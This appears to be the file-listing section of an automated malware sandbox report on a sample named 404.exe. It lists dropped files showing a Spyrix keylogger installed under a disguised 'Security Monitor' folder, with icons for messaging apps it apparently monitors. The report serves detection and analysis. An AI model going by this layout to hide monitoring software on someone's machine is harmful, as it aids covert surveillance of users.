Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
404.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\404.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
||
C:\Users\user\AppData\Local\Temp\is-PDS4H.tmp\404.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\cfg.cmd (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.url (copy)
|
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-07CCG.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0FOJS.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0JCQ3.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0P0UB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0PSGT.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-292TP.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-2L689.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-3GJCQ.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4F7AS.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4V4QI.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-52EK5.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-5V81M.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-69LME.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-70H11.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-7LBHV.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-840CA.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8AG25.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8V93S.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-9BK7G.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-BEL00.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-C5HQU.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CALJE.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CD668.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-D4IS9.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-DRP3L.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-ECGMB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FKN0E.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FOGGC.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-I0CN2.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JBHDC.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JBHVE.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-KF42H.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-KN8LA.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NBMRC.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-OA3D2.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-OEOTK.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PBMDV.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PCFFO.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PNRCE.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-QF9FB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-QV038.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-T7CCP.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-TK16E.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-U34QN.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-V1EBC.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-VJHFM.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Discord.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Facebook Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Google Talk.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Line.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mail Agent.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Microsoft Teams.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mozilla Thunderbird.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Opera Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Telegram.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Tencent QQ.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Viber.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\WhatsApp.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Windows Live Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Yahoo! Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Zoom.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\aim.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\icq.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-02UGO.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-5K063.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-6KMSA.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-6KN6G.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-6PTVT.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-72S64.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-7F3DD.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FDIQG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FHSLB.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FNCKH.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-HB8QG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-JRJV5.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-L4QSG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-LPL1L.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-LRFL4.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-MAFTE.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-NKOPS.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-OFBVL.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-QNLC6.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
